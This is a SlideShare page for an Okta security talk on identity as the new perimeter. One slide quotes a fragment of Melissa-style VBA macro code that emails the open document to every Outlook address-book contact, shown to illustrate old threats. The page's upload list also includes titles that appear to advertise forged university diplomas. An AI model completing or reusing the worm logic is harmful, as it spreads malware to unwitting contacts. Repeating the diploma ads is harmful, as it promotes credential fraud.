SlideShare ist ein Scribd-Unternehmen logo
Chris Niggel | Okta Director Security & Compliance
Identity as the Perimeter
October 2017
© Okta and/or its affiliates. All rights reserved. Okta Confidential
Or:
How
I Learned
To
Stop
Worrying
And
Love
The
Cloud
© Okta and/or its affiliates. All rights reserved. Okta Confidential
© Okta and/or its affiliates. All rights reserved. Okta Confidential
4
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
For y = 1 To DasMapiName.AddressLists.Count Set AddyBook =
DasMapiName.AddressLists(y)
Mail.Subject = "Important Message From " & Application.UserName
Mail.Body = "Here is that document you asked for”
Mail.Attachments.Add ActiveDocument.FullName
Mail.Send
© Okta and/or its affiliates. All rights reserved. Okta Confidential
© Okta and/or its affiliates. All rights reserved. Okta Confidential
Photo Credit: https://upload.wikimedia.org/wikipedia/commons/2/22/Bodiam_Castle_south.jpg
© Okta and/or its affiliates. All rights reserved. Okta Confidential
© Okta and/or its affiliates. All rights reserved. Okta Confidential
Image: http://thedailywtf.com/images/remy/robotguys.png
© Okta and/or its affiliates. All rights reserved. Okta Confidential
Source: Okta Businesses @ Work Report, Jan 2017
© Okta and/or its affiliates. All rights reserved. Okta Confidential
© Okta and/or its affiliates. All rights reserved. Okta Confidential
I can’t control what
applications employees use,
but I can make the approved
applications more attractive
than the alternatives
© Okta and/or its affiliates. All rights reserved. Okta Confidential
IDENTITY
Partners
Employees
Contractors
Customers
Cloud Platforms
On-Premises Systems
Applications
Devices
© Okta and/or its affiliates. All rights reserved. Okta Confidential
Context Adaptive Access
Allow
Step-up
Restrict
Deny
4,000+
okta confidential 14
© Okta and/or its affiliates. All rights reserved. Okta Confidential
© Okta and/or its affiliates. All rights reserved. Okta Confidential
1
Identity as the Perimeter

Weitere ähnliche Inhalte

Was ist angesagt?

C-Level tools for Cloud security
C-Level tools for Cloud securityC-Level tools for Cloud security
C-Level tools for Cloud security
Vladimir Jirasek
 
Cisco Connect 2018 Singapore - Cisco CMX
Cisco Connect 2018 Singapore - Cisco CMXCisco Connect 2018 Singapore - Cisco CMX
Cisco Connect 2018 Singapore - Cisco CMX
NetworkCollaborators
 
CASB Cases: How Your Peers are Securing the Cloud
CASB Cases: How Your Peers are Securing the CloudCASB Cases: How Your Peers are Securing the Cloud
CASB Cases: How Your Peers are Securing the Cloud
Bitglass
 
CIO's Guide to Enterprise Cloud Adoption
CIO's Guide to Enterprise Cloud AdoptionCIO's Guide to Enterprise Cloud Adoption
CIO's Guide to Enterprise Cloud Adoption
CipherCloud
 
Protegendo sua rede
Protegendo sua redeProtegendo sua rede
Protegendo sua rede
Cisco do Brasil
 
Cisco Connect 2018 Singapore - The Network Intuitive
Cisco Connect 2018 Singapore - The Network IntuitiveCisco Connect 2018 Singapore - The Network Intuitive
Cisco Connect 2018 Singapore - The Network Intuitive
NetworkCollaborators
 
Webinar Express: What is a CASB?
Webinar Express: What is a CASB?Webinar Express: What is a CASB?
Webinar Express: What is a CASB?
Bitglass
 
Cisco Connect 2018 Singapore - Transforming Enterprises in a Multi-Cloud World
Cisco Connect 2018 Singapore - Transforming Enterprises in a Multi-Cloud WorldCisco Connect 2018 Singapore - Transforming Enterprises in a Multi-Cloud World
Cisco Connect 2018 Singapore - Transforming Enterprises in a Multi-Cloud World
NetworkCollaborators
 
Zero Trust Enterprise Network at Adobe
Zero Trust Enterprise Network at AdobeZero Trust Enterprise Network at Adobe
Zero Trust Enterprise Network at Adobe
Vishwas Manral
 
Cisco Connect 2018 Singapore - Do more than keep the lights on
Cisco Connect 2018 Singapore - Do more than keep the lights onCisco Connect 2018 Singapore - Do more than keep the lights on
Cisco Connect 2018 Singapore - Do more than keep the lights on
NetworkCollaborators
 
Cisco Connect 2018 Singapore - Next generation hyperconverged infrastructure
Cisco Connect 2018 Singapore - Next generation hyperconverged infrastructureCisco Connect 2018 Singapore - Next generation hyperconverged infrastructure
Cisco Connect 2018 Singapore - Next generation hyperconverged infrastructure
NetworkCollaborators
 
Cisco Connect 2018 Indonesia - Delivering intent for data center networking
Cisco Connect 2018 Indonesia - Delivering intent for data center networking Cisco Connect 2018 Indonesia - Delivering intent for data center networking
Cisco Connect 2018 Indonesia - Delivering intent for data center networking
NetworkCollaborators
 
Cisco Connect 2018 Singapore - Changing the Security Equation
Cisco Connect 2018 Singapore - Changing the Security EquationCisco Connect 2018 Singapore - Changing the Security Equation
Cisco Connect 2018 Singapore - Changing the Security Equation
NetworkCollaborators
 
Enterprise Microservices
Enterprise MicroservicesEnterprise Microservices
Enterprise Microservices
Dony Riyanto
 
Cisco Connect 2018 Singapore - Cisco Incident Response Services
Cisco Connect 2018 Singapore - Cisco Incident Response ServicesCisco Connect 2018 Singapore - Cisco Incident Response Services
Cisco Connect 2018 Singapore - Cisco Incident Response Services
NetworkCollaborators
 
Cisco Connect 2018 Vietnam - Cisco meraki
Cisco Connect 2018 Vietnam - Cisco meraki Cisco Connect 2018 Vietnam - Cisco meraki
Cisco Connect 2018 Vietnam - Cisco meraki
NetworkCollaborators
 
Accelerating Digital Leadership
Accelerating Digital LeadershipAccelerating Digital Leadership
Accelerating Digital Leadership
M2M Alliance e.V.
 
IoT Architecture: Insights from Global Deployments
IoT Architecture: Insights from Global DeploymentsIoT Architecture: Insights from Global Deployments
IoT Architecture: Insights from Global Deployments
Apigee | Google Cloud
 
[Cisco Connect 2018 - Vietnam] Jeff chua hcm print - cisco connect 2018 (hc...
[Cisco Connect 2018 - Vietnam] Jeff chua   hcm print - cisco connect 2018 (hc...[Cisco Connect 2018 - Vietnam] Jeff chua   hcm print - cisco connect 2018 (hc...
[Cisco Connect 2018 - Vietnam] Jeff chua hcm print - cisco connect 2018 (hc...
Nur Shiqim Chok
 
[Cisco Connect 2018 - Vietnam] Jeff chua hn - print - cisco connect 2018 (ha...
[Cisco Connect 2018 - Vietnam] Jeff chua  hn - print - cisco connect 2018 (ha...[Cisco Connect 2018 - Vietnam] Jeff chua  hn - print - cisco connect 2018 (ha...
[Cisco Connect 2018 - Vietnam] Jeff chua hn - print - cisco connect 2018 (ha...
Nur Shiqim Chok
 

Was ist angesagt? (20)

C-Level tools for Cloud security
C-Level tools for Cloud securityC-Level tools for Cloud security
C-Level tools for Cloud security
 
Cisco Connect 2018 Singapore - Cisco CMX
Cisco Connect 2018 Singapore - Cisco CMXCisco Connect 2018 Singapore - Cisco CMX
Cisco Connect 2018 Singapore - Cisco CMX
 
CASB Cases: How Your Peers are Securing the Cloud
CASB Cases: How Your Peers are Securing the CloudCASB Cases: How Your Peers are Securing the Cloud
CASB Cases: How Your Peers are Securing the Cloud
 
CIO's Guide to Enterprise Cloud Adoption
CIO's Guide to Enterprise Cloud AdoptionCIO's Guide to Enterprise Cloud Adoption
CIO's Guide to Enterprise Cloud Adoption
 
Protegendo sua rede
Protegendo sua redeProtegendo sua rede
Protegendo sua rede
 
Cisco Connect 2018 Singapore - The Network Intuitive
Cisco Connect 2018 Singapore - The Network IntuitiveCisco Connect 2018 Singapore - The Network Intuitive
Cisco Connect 2018 Singapore - The Network Intuitive
 
Webinar Express: What is a CASB?
Webinar Express: What is a CASB?Webinar Express: What is a CASB?
Webinar Express: What is a CASB?
 
Cisco Connect 2018 Singapore - Transforming Enterprises in a Multi-Cloud World
Cisco Connect 2018 Singapore - Transforming Enterprises in a Multi-Cloud WorldCisco Connect 2018 Singapore - Transforming Enterprises in a Multi-Cloud World
Cisco Connect 2018 Singapore - Transforming Enterprises in a Multi-Cloud World
 
Zero Trust Enterprise Network at Adobe
Zero Trust Enterprise Network at AdobeZero Trust Enterprise Network at Adobe
Zero Trust Enterprise Network at Adobe
 
Cisco Connect 2018 Singapore - Do more than keep the lights on
Cisco Connect 2018 Singapore - Do more than keep the lights onCisco Connect 2018 Singapore - Do more than keep the lights on
Cisco Connect 2018 Singapore - Do more than keep the lights on
 
Cisco Connect 2018 Singapore - Next generation hyperconverged infrastructure
Cisco Connect 2018 Singapore - Next generation hyperconverged infrastructureCisco Connect 2018 Singapore - Next generation hyperconverged infrastructure
Cisco Connect 2018 Singapore - Next generation hyperconverged infrastructure
 
Cisco Connect 2018 Indonesia - Delivering intent for data center networking
Cisco Connect 2018 Indonesia - Delivering intent for data center networking Cisco Connect 2018 Indonesia - Delivering intent for data center networking
Cisco Connect 2018 Indonesia - Delivering intent for data center networking
 
Cisco Connect 2018 Singapore - Changing the Security Equation
Cisco Connect 2018 Singapore - Changing the Security EquationCisco Connect 2018 Singapore - Changing the Security Equation
Cisco Connect 2018 Singapore - Changing the Security Equation
 
Enterprise Microservices
Enterprise MicroservicesEnterprise Microservices
Enterprise Microservices
 
Cisco Connect 2018 Singapore - Cisco Incident Response Services
Cisco Connect 2018 Singapore - Cisco Incident Response ServicesCisco Connect 2018 Singapore - Cisco Incident Response Services
Cisco Connect 2018 Singapore - Cisco Incident Response Services
 
Cisco Connect 2018 Vietnam - Cisco meraki
Cisco Connect 2018 Vietnam - Cisco meraki Cisco Connect 2018 Vietnam - Cisco meraki
Cisco Connect 2018 Vietnam - Cisco meraki
 
Accelerating Digital Leadership
Accelerating Digital LeadershipAccelerating Digital Leadership
Accelerating Digital Leadership
 
IoT Architecture: Insights from Global Deployments
IoT Architecture: Insights from Global DeploymentsIoT Architecture: Insights from Global Deployments
IoT Architecture: Insights from Global Deployments
 
[Cisco Connect 2018 - Vietnam] Jeff chua hcm print - cisco connect 2018 (hc...
[Cisco Connect 2018 - Vietnam] Jeff chua   hcm print - cisco connect 2018 (hc...[Cisco Connect 2018 - Vietnam] Jeff chua   hcm print - cisco connect 2018 (hc...
[Cisco Connect 2018 - Vietnam] Jeff chua hcm print - cisco connect 2018 (hc...
 
[Cisco Connect 2018 - Vietnam] Jeff chua hn - print - cisco connect 2018 (ha...
[Cisco Connect 2018 - Vietnam] Jeff chua  hn - print - cisco connect 2018 (ha...[Cisco Connect 2018 - Vietnam] Jeff chua  hn - print - cisco connect 2018 (ha...
[Cisco Connect 2018 - Vietnam] Jeff chua hn - print - cisco connect 2018 (ha...
 

Ähnlich wie Identity as the Perimeter

Leveraging the AWS Cloud Adoption Framework to Build Your Cloud Action Plan (...
Leveraging the AWS Cloud Adoption Framework to Build Your Cloud Action Plan (...Leveraging the AWS Cloud Adoption Framework to Build Your Cloud Action Plan (...
Leveraging the AWS Cloud Adoption Framework to Build Your Cloud Action Plan (...
Amazon Web Services
 
Cisco Connect 2018 Philippines - delivering a secure, intelligent platform fo...
Cisco Connect 2018 Philippines - delivering a secure, intelligent platform fo...Cisco Connect 2018 Philippines - delivering a secure, intelligent platform fo...
Cisco Connect 2018 Philippines - delivering a secure, intelligent platform fo...
NetworkCollaborators
 
A Novel Additive Order Protocol in Cloud Storage and Avoiding the Trapdoors
A Novel Additive Order Protocol in Cloud Storage and Avoiding the TrapdoorsA Novel Additive Order Protocol in Cloud Storage and Avoiding the Trapdoors
A Novel Additive Order Protocol in Cloud Storage and Avoiding the Trapdoors
IRJET Journal
 
ENT223_Leveraging the AWS Cloud Adoption Framework to Build Your Cloud Action...
ENT223_Leveraging the AWS Cloud Adoption Framework to Build Your Cloud Action...ENT223_Leveraging the AWS Cloud Adoption Framework to Build Your Cloud Action...
ENT223_Leveraging the AWS Cloud Adoption Framework to Build Your Cloud Action...
Amazon Web Services
 
Python and the MySQL Document Store
Python and the MySQL Document StorePython and the MySQL Document Store
Python and the MySQL Document Store
Jesper Wisborg Krogh
 
Integrate Amazon WorkDocs with Security & Compliance Solutions & Applications...
Integrate Amazon WorkDocs with Security & Compliance Solutions & Applications...Integrate Amazon WorkDocs with Security & Compliance Solutions & Applications...
Integrate Amazon WorkDocs with Security & Compliance Solutions & Applications...
Amazon Web Services
 
2018-10-23 4 B - Data leakage prevention and rights management in Office 365 ...
2018-10-23 4 B - Data leakage prevention and rights management in Office 365 ...2018-10-23 4 B - Data leakage prevention and rights management in Office 365 ...
2018-10-23 4 B - Data leakage prevention and rights management in Office 365 ...
aOS Community
 
Working with Open Data on AWS
Working with Open Data on AWSWorking with Open Data on AWS
Working with Open Data on AWS
Amazon Web Services
 
01-Chapter 01-Introduction to CASB and Netskope.pptx
01-Chapter 01-Introduction to CASB and Netskope.pptx01-Chapter 01-Introduction to CASB and Netskope.pptx
01-Chapter 01-Introduction to CASB and Netskope.pptx
ssuser4c54af
 
Top 5 Cisco Webex Integrations for Your Every Day Tools and Applications
Top 5 Cisco Webex Integrations for Your Every Day Tools and ApplicationsTop 5 Cisco Webex Integrations for Your Every Day Tools and Applications
Top 5 Cisco Webex Integrations for Your Every Day Tools and Applications
Cisco Webex
 
Digital Velocity London 2017: Data Layer Enrichment API
Digital Velocity London 2017: Data Layer Enrichment APIDigital Velocity London 2017: Data Layer Enrichment API
Digital Velocity London 2017: Data Layer Enrichment API
Tealium
 
Decentralized enterprise architecture using Blockchain & AWS
Decentralized enterprise architecture using Blockchain & AWSDecentralized enterprise architecture using Blockchain & AWS
Decentralized enterprise architecture using Blockchain & AWS
AWS User Group Bengaluru
 
Internship Report AT&T - Summer 2015
Internship Report AT&T - Summer 2015Internship Report AT&T - Summer 2015
Internship Report AT&T - Summer 2015
Suchit Patel
 
CIS 2015- Beyond Federation Protocols- Praerit Garg
CIS 2015- Beyond Federation Protocols- Praerit GargCIS 2015- Beyond Federation Protocols- Praerit Garg
CIS 2015- Beyond Federation Protocols- Praerit Garg
CloudIDSummit
 
C-Level tools for Cloud strategy decisions
C-Level tools for Cloud strategy decisionsC-Level tools for Cloud strategy decisions
C-Level tools for Cloud strategy decisions
Cloud Security Alliance, UK chapter
 
Enhancing Security in Dynamic Public Cloud Data Using Encryption
Enhancing Security in Dynamic Public Cloud Data Using EncryptionEnhancing Security in Dynamic Public Cloud Data Using Encryption
Enhancing Security in Dynamic Public Cloud Data Using Encryption
Association of Scientists, Developers and Faculties
 
Digital Velocity London 2017: All About The Data
Digital Velocity London 2017: All About The DataDigital Velocity London 2017: All About The Data
Digital Velocity London 2017: All About The Data
Tealium
 
How to Perform Forensics on AWS Using Serverless Infrastructure (SEC416-R1) -...
How to Perform Forensics on AWS Using Serverless Infrastructure (SEC416-R1) -...How to Perform Forensics on AWS Using Serverless Infrastructure (SEC416-R1) -...
How to Perform Forensics on AWS Using Serverless Infrastructure (SEC416-R1) -...
Amazon Web Services
 
Getting Your Office 365 Set Up Right
Getting Your Office 365 Set Up RightGetting Your Office 365 Set Up Right
Getting Your Office 365 Set Up Right
J. Kevin Parker, CIP
 
I Am MEC 14 - How to (remote) control office 365 with Azure
I Am MEC 14 - How to (remote) control office 365 with Azure I Am MEC 14 - How to (remote) control office 365 with Azure
I Am MEC 14 - How to (remote) control office 365 with Azure
atwork
 

Ähnlich wie Identity as the Perimeter (20)

Leveraging the AWS Cloud Adoption Framework to Build Your Cloud Action Plan (...
Leveraging the AWS Cloud Adoption Framework to Build Your Cloud Action Plan (...Leveraging the AWS Cloud Adoption Framework to Build Your Cloud Action Plan (...
Leveraging the AWS Cloud Adoption Framework to Build Your Cloud Action Plan (...
 
Cisco Connect 2018 Philippines - delivering a secure, intelligent platform fo...
Cisco Connect 2018 Philippines - delivering a secure, intelligent platform fo...Cisco Connect 2018 Philippines - delivering a secure, intelligent platform fo...
Cisco Connect 2018 Philippines - delivering a secure, intelligent platform fo...
 
A Novel Additive Order Protocol in Cloud Storage and Avoiding the Trapdoors
A Novel Additive Order Protocol in Cloud Storage and Avoiding the TrapdoorsA Novel Additive Order Protocol in Cloud Storage and Avoiding the Trapdoors
A Novel Additive Order Protocol in Cloud Storage and Avoiding the Trapdoors
 
ENT223_Leveraging the AWS Cloud Adoption Framework to Build Your Cloud Action...
ENT223_Leveraging the AWS Cloud Adoption Framework to Build Your Cloud Action...ENT223_Leveraging the AWS Cloud Adoption Framework to Build Your Cloud Action...
ENT223_Leveraging the AWS Cloud Adoption Framework to Build Your Cloud Action...
 
Python and the MySQL Document Store
Python and the MySQL Document StorePython and the MySQL Document Store
Python and the MySQL Document Store
 
Integrate Amazon WorkDocs with Security & Compliance Solutions & Applications...
Integrate Amazon WorkDocs with Security & Compliance Solutions & Applications...Integrate Amazon WorkDocs with Security & Compliance Solutions & Applications...
Integrate Amazon WorkDocs with Security & Compliance Solutions & Applications...
 
2018-10-23 4 B - Data leakage prevention and rights management in Office 365 ...
2018-10-23 4 B - Data leakage prevention and rights management in Office 365 ...2018-10-23 4 B - Data leakage prevention and rights management in Office 365 ...
2018-10-23 4 B - Data leakage prevention and rights management in Office 365 ...
 
Working with Open Data on AWS
Working with Open Data on AWSWorking with Open Data on AWS
Working with Open Data on AWS
 
01-Chapter 01-Introduction to CASB and Netskope.pptx
01-Chapter 01-Introduction to CASB and Netskope.pptx01-Chapter 01-Introduction to CASB and Netskope.pptx
01-Chapter 01-Introduction to CASB and Netskope.pptx
 
Top 5 Cisco Webex Integrations for Your Every Day Tools and Applications
Top 5 Cisco Webex Integrations for Your Every Day Tools and ApplicationsTop 5 Cisco Webex Integrations for Your Every Day Tools and Applications
Top 5 Cisco Webex Integrations for Your Every Day Tools and Applications
 
Digital Velocity London 2017: Data Layer Enrichment API
Digital Velocity London 2017: Data Layer Enrichment APIDigital Velocity London 2017: Data Layer Enrichment API
Digital Velocity London 2017: Data Layer Enrichment API
 
Decentralized enterprise architecture using Blockchain & AWS
Decentralized enterprise architecture using Blockchain & AWSDecentralized enterprise architecture using Blockchain & AWS
Decentralized enterprise architecture using Blockchain & AWS
 
Internship Report AT&T - Summer 2015
Internship Report AT&T - Summer 2015Internship Report AT&T - Summer 2015
Internship Report AT&T - Summer 2015
 
CIS 2015- Beyond Federation Protocols- Praerit Garg
CIS 2015- Beyond Federation Protocols- Praerit GargCIS 2015- Beyond Federation Protocols- Praerit Garg
CIS 2015- Beyond Federation Protocols- Praerit Garg
 
C-Level tools for Cloud strategy decisions
C-Level tools for Cloud strategy decisionsC-Level tools for Cloud strategy decisions
C-Level tools for Cloud strategy decisions
 
Enhancing Security in Dynamic Public Cloud Data Using Encryption
Enhancing Security in Dynamic Public Cloud Data Using EncryptionEnhancing Security in Dynamic Public Cloud Data Using Encryption
Enhancing Security in Dynamic Public Cloud Data Using Encryption
 
Digital Velocity London 2017: All About The Data
Digital Velocity London 2017: All About The DataDigital Velocity London 2017: All About The Data
Digital Velocity London 2017: All About The Data
 
How to Perform Forensics on AWS Using Serverless Infrastructure (SEC416-R1) -...
How to Perform Forensics on AWS Using Serverless Infrastructure (SEC416-R1) -...How to Perform Forensics on AWS Using Serverless Infrastructure (SEC416-R1) -...
How to Perform Forensics on AWS Using Serverless Infrastructure (SEC416-R1) -...
 
Getting Your Office 365 Set Up Right
Getting Your Office 365 Set Up RightGetting Your Office 365 Set Up Right
Getting Your Office 365 Set Up Right
 
I Am MEC 14 - How to (remote) control office 365 with Azure
I Am MEC 14 - How to (remote) control office 365 with Azure I Am MEC 14 - How to (remote) control office 365 with Azure
I Am MEC 14 - How to (remote) control office 365 with Azure
 

Mehr von scoopnewsgroup

2020: What's on Deck for the PMA
2020: What's on Deck for the PMA2020: What's on Deck for the PMA
2020: What's on Deck for the PMA
scoopnewsgroup
 
Modernization Requires Choice
Modernization Requires ChoiceModernization Requires Choice
Modernization Requires Choice
scoopnewsgroup
 
Smarter Access is the Bridge to Security Modernization
Smarter Access is the Bridge to Security ModernizationSmarter Access is the Bridge to Security Modernization
Smarter Access is the Bridge to Security Modernization
scoopnewsgroup
 
How Zero Trust Makes the Mission Simple & Secure
How Zero Trust Makes the Mission Simple & SecureHow Zero Trust Makes the Mission Simple & Secure
How Zero Trust Makes the Mission Simple & Secure
scoopnewsgroup
 
Building a Zero Trust Architecture
Building a Zero Trust ArchitectureBuilding a Zero Trust Architecture
Building a Zero Trust Architecture
scoopnewsgroup
 
History of Data-Centric Transformation
History of Data-Centric TransformationHistory of Data-Centric Transformation
History of Data-Centric Transformation
scoopnewsgroup
 
IC Fireside Chat
IC Fireside ChatIC Fireside Chat
IC Fireside Chat
scoopnewsgroup
 
The Edge to AI
The Edge to AIThe Edge to AI
The Edge to AI
scoopnewsgroup
 
Data Strategy – What Does an Enterprise Data Cloud Mean for Your Agency?
Data Strategy – What Does an Enterprise Data Cloud Mean for Your Agency?Data Strategy – What Does an Enterprise Data Cloud Mean for Your Agency?
Data Strategy – What Does an Enterprise Data Cloud Mean for Your Agency?
scoopnewsgroup
 
Devil's Bargain: Sacrificing Strategic Investments to Fund Today's Problems
Devil's Bargain: Sacrificing Strategic Investments to Fund Today's ProblemsDevil's Bargain: Sacrificing Strategic Investments to Fund Today's Problems
Devil's Bargain: Sacrificing Strategic Investments to Fund Today's Problems
scoopnewsgroup
 
Moving Beyond Zero Trust
Moving Beyond Zero TrustMoving Beyond Zero Trust
Moving Beyond Zero Trust
scoopnewsgroup
 
Keeping the Workforce of the Future Empowered, Engaged & Happy
Keeping the Workforce of the Future Empowered, Engaged & HappyKeeping the Workforce of the Future Empowered, Engaged & Happy
Keeping the Workforce of the Future Empowered, Engaged & Happy
scoopnewsgroup
 
Opening Remarks
Opening RemarksOpening Remarks
Opening Remarks
scoopnewsgroup
 
It All Starts with Linux
It All Starts with LinuxIt All Starts with Linux
It All Starts with Linux
scoopnewsgroup
 
Leadership in the Digital Age
Leadership in the Digital AgeLeadership in the Digital Age
Leadership in the Digital Age
scoopnewsgroup
 
Digital Transformation for Government
Digital Transformation for GovernmentDigital Transformation for Government
Digital Transformation for Government
scoopnewsgroup
 
DevSecOps: The DoD Software Factory
DevSecOps: The DoD Software FactoryDevSecOps: The DoD Software Factory
DevSecOps: The DoD Software Factory
scoopnewsgroup
 
Enhancing your Cyber Skills through a Cyber Range
Enhancing your Cyber Skills through a Cyber RangeEnhancing your Cyber Skills through a Cyber Range
Enhancing your Cyber Skills through a Cyber Range
scoopnewsgroup
 
Lessons Learned from Fire Escapes for Cybersecurity
Lessons Learned from Fire Escapes for CybersecurityLessons Learned from Fire Escapes for Cybersecurity
Lessons Learned from Fire Escapes for Cybersecurity
scoopnewsgroup
 
2019 FedScoop Public Sector innovation Summit
2019 FedScoop Public Sector innovation Summit2019 FedScoop Public Sector innovation Summit
2019 FedScoop Public Sector innovation Summit
scoopnewsgroup
 

Mehr von scoopnewsgroup (20)

2020: What's on Deck for the PMA
2020: What's on Deck for the PMA2020: What's on Deck for the PMA
2020: What's on Deck for the PMA
 
Modernization Requires Choice
Modernization Requires ChoiceModernization Requires Choice
Modernization Requires Choice
 
Smarter Access is the Bridge to Security Modernization
Smarter Access is the Bridge to Security ModernizationSmarter Access is the Bridge to Security Modernization
Smarter Access is the Bridge to Security Modernization
 
How Zero Trust Makes the Mission Simple & Secure
How Zero Trust Makes the Mission Simple & SecureHow Zero Trust Makes the Mission Simple & Secure
How Zero Trust Makes the Mission Simple & Secure
 
Building a Zero Trust Architecture
Building a Zero Trust ArchitectureBuilding a Zero Trust Architecture
Building a Zero Trust Architecture
 
History of Data-Centric Transformation
History of Data-Centric TransformationHistory of Data-Centric Transformation
History of Data-Centric Transformation
 
IC Fireside Chat
IC Fireside ChatIC Fireside Chat
IC Fireside Chat
 
The Edge to AI
The Edge to AIThe Edge to AI
The Edge to AI
 
Data Strategy – What Does an Enterprise Data Cloud Mean for Your Agency?
Data Strategy – What Does an Enterprise Data Cloud Mean for Your Agency?Data Strategy – What Does an Enterprise Data Cloud Mean for Your Agency?
Data Strategy – What Does an Enterprise Data Cloud Mean for Your Agency?
 
Devil's Bargain: Sacrificing Strategic Investments to Fund Today's Problems
Devil's Bargain: Sacrificing Strategic Investments to Fund Today's ProblemsDevil's Bargain: Sacrificing Strategic Investments to Fund Today's Problems
Devil's Bargain: Sacrificing Strategic Investments to Fund Today's Problems
 
Moving Beyond Zero Trust
Moving Beyond Zero TrustMoving Beyond Zero Trust
Moving Beyond Zero Trust
 
Keeping the Workforce of the Future Empowered, Engaged & Happy
Keeping the Workforce of the Future Empowered, Engaged & HappyKeeping the Workforce of the Future Empowered, Engaged & Happy
Keeping the Workforce of the Future Empowered, Engaged & Happy
 
Opening Remarks
Opening RemarksOpening Remarks
Opening Remarks
 
It All Starts with Linux
It All Starts with LinuxIt All Starts with Linux
It All Starts with Linux
 
Leadership in the Digital Age
Leadership in the Digital AgeLeadership in the Digital Age
Leadership in the Digital Age
 
Digital Transformation for Government
Digital Transformation for GovernmentDigital Transformation for Government
Digital Transformation for Government
 
DevSecOps: The DoD Software Factory
DevSecOps: The DoD Software FactoryDevSecOps: The DoD Software Factory
DevSecOps: The DoD Software Factory
 
Enhancing your Cyber Skills through a Cyber Range
Enhancing your Cyber Skills through a Cyber RangeEnhancing your Cyber Skills through a Cyber Range
Enhancing your Cyber Skills through a Cyber Range
 
Lessons Learned from Fire Escapes for Cybersecurity
Lessons Learned from Fire Escapes for CybersecurityLessons Learned from Fire Escapes for Cybersecurity
Lessons Learned from Fire Escapes for Cybersecurity
 
2019 FedScoop Public Sector innovation Summit
2019 FedScoop Public Sector innovation Summit2019 FedScoop Public Sector innovation Summit
2019 FedScoop Public Sector innovation Summit
 

Kürzlich hochgeladen

快速办理(Bristol毕业证书)布里斯托大学毕业证Offer一模一样
快速办理(Bristol毕业证书)布里斯托大学毕业证Offer一模一样快速办理(Bristol毕业证书)布里斯托大学毕业证Offer一模一样
快速办理(Bristol毕业证书)布里斯托大学毕业证Offer一模一样
3woawyyl
 
2024: The FAR - Federal Acquisition Regulations, Part 40
2024: The FAR - Federal Acquisition Regulations, Part 402024: The FAR - Federal Acquisition Regulations, Part 40
2024: The FAR - Federal Acquisition Regulations, Part 40
JSchaus & Associates
 
2024: The FAR - Federal Acquisition Regulations, Part 42
2024: The FAR - Federal Acquisition Regulations, Part 422024: The FAR - Federal Acquisition Regulations, Part 42
2024: The FAR - Federal Acquisition Regulations, Part 42
JSchaus & Associates
 
原版制作(DPU毕业证书)德保罗大学毕业证Offer一模一样
原版制作(DPU毕业证书)德保罗大学毕业证Offer一模一样原版制作(DPU毕业证书)德保罗大学毕业证Offer一模一样
原版制作(DPU毕业证书)德保罗大学毕业证Offer一模一样
yemqpj
 
Abiy Berehe - Texas Commission on Environmental Quality Updates
Abiy Berehe - Texas Commission on Environmental Quality UpdatesAbiy Berehe - Texas Commission on Environmental Quality Updates
Abiy Berehe - Texas Commission on Environmental Quality Updates
Texas Alliance of Groundwater Districts
 
Item #s 8&9 -- Demolition Code Amendment
Item #s 8&9 -- Demolition Code AmendmentItem #s 8&9 -- Demolition Code Amendment
Item #s 8&9 -- Demolition Code Amendment
ahcitycouncil
 
Texas Water Development Board Updates June 2024
Texas Water Development Board Updates June 2024Texas Water Development Board Updates June 2024
Texas Water Development Board Updates June 2024
Texas Alliance of Groundwater Districts
 
karnataka housing board schemes . all schemes
karnataka housing board schemes . all schemeskarnataka housing board schemes . all schemes
karnataka housing board schemes . all schemes
narinav14
 
China Politics social economic political
China Politics social economic politicalChina Politics social economic political
China Politics social economic political
ajatjamwal123
 
Combined Illegal, Unregulated and Unreported (IUU) Vessel List.
Combined Illegal, Unregulated and Unreported (IUU) Vessel List.Combined Illegal, Unregulated and Unreported (IUU) Vessel List.
Combined Illegal, Unregulated and Unreported (IUU) Vessel List.
Christina Parmionova
 
Milton Keynes Hospital Charity - A guide to leaving a gift in your Will
Milton Keynes Hospital Charity - A guide to leaving a gift in your WillMilton Keynes Hospital Charity - A guide to leaving a gift in your Will
Milton Keynes Hospital Charity - A guide to leaving a gift in your Will
fundraising4
 
Bharat Mata - History of Indian culture.pdf
Bharat Mata - History of Indian culture.pdfBharat Mata - History of Indian culture.pdf
Bharat Mata - History of Indian culture.pdf
Bharat Mata
 
IEA World Energy Investment June 2024- Statistics
IEA World Energy Investment June 2024- StatisticsIEA World Energy Investment June 2024- Statistics
IEA World Energy Investment June 2024- Statistics
Energy for One World
 
Researching the client.pptxsxssssssssssssssssssssss
Researching the client.pptxsxssssssssssssssssssssssResearching the client.pptxsxssssssssssssssssssssss
Researching the client.pptxsxssssssssssssssssssssss
DanielOliver74
 
Contributi dei parlamentari del PD - Contributi L. 3/2019
Contributi dei parlamentari del PD - Contributi L. 3/2019Contributi dei parlamentari del PD - Contributi L. 3/2019
Contributi dei parlamentari del PD - Contributi L. 3/2019
Partito democratico
 
World Food Safety Day 2024- Communication-toolkit.
World Food Safety Day 2024- Communication-toolkit.World Food Safety Day 2024- Communication-toolkit.
World Food Safety Day 2024- Communication-toolkit.
Christina Parmionova
 
2024: The FAR - Federal Acquisition Regulations, Part 39
2024: The FAR - Federal Acquisition Regulations, Part 392024: The FAR - Federal Acquisition Regulations, Part 39
2024: The FAR - Federal Acquisition Regulations, Part 39
JSchaus & Associates
 
Item # 10 -- Historical Presv. Districts
Item # 10 -- Historical Presv. DistrictsItem # 10 -- Historical Presv. Districts
Item # 10 -- Historical Presv. Districts
ahcitycouncil
 
快速办理(UVM毕业证书)佛蒙特大学毕业证学位证一模一样
快速办理(UVM毕业证书)佛蒙特大学毕业证学位证一模一样快速办理(UVM毕业证书)佛蒙特大学毕业证学位证一模一样
快速办理(UVM毕业证书)佛蒙特大学毕业证学位证一模一样
yemqpj
 
PPT Item # 7 - 231 Encino Avenue (sign. review)
PPT Item # 7 - 231 Encino Avenue (sign. review)PPT Item # 7 - 231 Encino Avenue (sign. review)
PPT Item # 7 - 231 Encino Avenue (sign. review)
ahcitycouncil
 

Kürzlich hochgeladen (20)

快速办理(Bristol毕业证书)布里斯托大学毕业证Offer一模一样
快速办理(Bristol毕业证书)布里斯托大学毕业证Offer一模一样快速办理(Bristol毕业证书)布里斯托大学毕业证Offer一模一样
快速办理(Bristol毕业证书)布里斯托大学毕业证Offer一模一样
 
2024: The FAR - Federal Acquisition Regulations, Part 40
